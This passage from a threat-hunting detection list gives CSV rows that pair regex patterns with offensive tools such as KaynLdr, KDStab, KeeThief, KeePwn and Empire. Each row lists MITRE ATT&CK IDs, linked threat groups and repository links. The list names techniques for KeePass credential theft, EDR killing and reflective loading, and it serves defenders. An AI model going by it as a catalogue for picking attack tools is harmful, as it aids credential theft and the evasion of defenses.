TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KaynInject.x86.exe*",".{0,1000}KaynInject\.x86\.exe.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KAYNINJECT_KAYNINJECT_H*",".{0,1000}KAYNINJECT_KAYNINJECT_H.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KaynLdr.x64.dll*",".{0,1000}KaynLdr\.x64\.dll.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KAYNLDR_KAYNLDR_H*",".{0,1000}KAYNLDR_KAYNLDR_H.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KaynStrike.x64.bin*",".{0,1000}KaynStrike\.x64\.bin.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*KaynStrike.x64.exe*",".{0,1000}KaynStrike\.x64\.exe.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - 
TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*KBDPAYLOAD.dll*",".{0,1000}KBDPAYLOAD\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","158","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*KCMTicketFormatter.py*",".{0,1000}KCMTicketFormatter\.py.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","1","N/A","7","1","36","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z" "*KcpPassword.cs*",".{0,1000}KcpPassword\.cs.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key 
material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*kdcdump2john.py*",".{0,1000}kdcdump2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*kdstab * /CHECK*",".{0,1000}kdstab\s.{0,1000}\s\/CHECK.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * 
/CLOSE*",".{0,1000}kdstab\s.{0,1000}\s\/CLOSE.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /DRIVER*",".{0,1000}kdstab\s.{0,1000}\s\/DRIVER.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /KILL*",".{0,1000}kdstab\s.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /LIST*",".{0,1000}kdstab\s.{0,1000}\s\/LIST.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /NAME*",".{0,1000}kdstab\s.{0,1000}\s\/NAME.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /PID*",".{0,1000}kdstab\s.{0,1000}\s\/PID.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /SERVICE*",".{0,1000}kdstab\s.{0,1000}\s\/SERVICE.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /STRIP*",".{0,1000}kdstab\s.{0,1000}\s\/STRIP.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /UNLOAD*",".{0,1000}kdstab\s.{0,1000}\s\/UNLOAD.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab.cna*",".{0,1000}kdstab\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KeeFarceReborn.*",".{0,1000}KeeFarceReborn\..{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*KeePass config file is backdoored already*",".{0,1000}KeePass\sconfig\sfile\sis\sbackdoored\salready.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*KeePass.sln*",".{0,1000}KeePass\.sln.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*keepass_common_plug.*",".{0,1000}keepass_common_plug\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo 
- advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*keepass_discover.py*",".{0,1000}keepass_discover\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*keepass2john *.kdbx*",".{0,1000}keepass2john\s.{0,1000}\.kdbx.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*KeePassBackdoor.*",".{0,1000}KeePassBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*KeePassConfig.ps1*",".{0,1000}KeePassConfig\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeePassConfig.ps1*",".{0,1000}KeePassConfig\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*-KeePassConfigTrigger*",".{0,1000}\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeePassHax.dll*",".{0,1000}KeePassHax\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*keepass-password-dumper*",".{0,1000}keepass\-password\-dumper.{0,1000}","offensive_tool_keyword","keepass-password-dumper","KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass's 
memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. just a memory dump","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/vdohney/keepass-password-dumper","1","1","N/A","N/A","7","618","57","2023-08-17T19:26:55Z","2023-05-01T17:08:55Z" "*keepass-password-dumper*",".{0,1000}keepass\-password\-dumper.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn --*",".{0,1000}KeePwn\s\-\-.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn parse_dump *",".{0,1000}KeePwn\sparse_dump\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 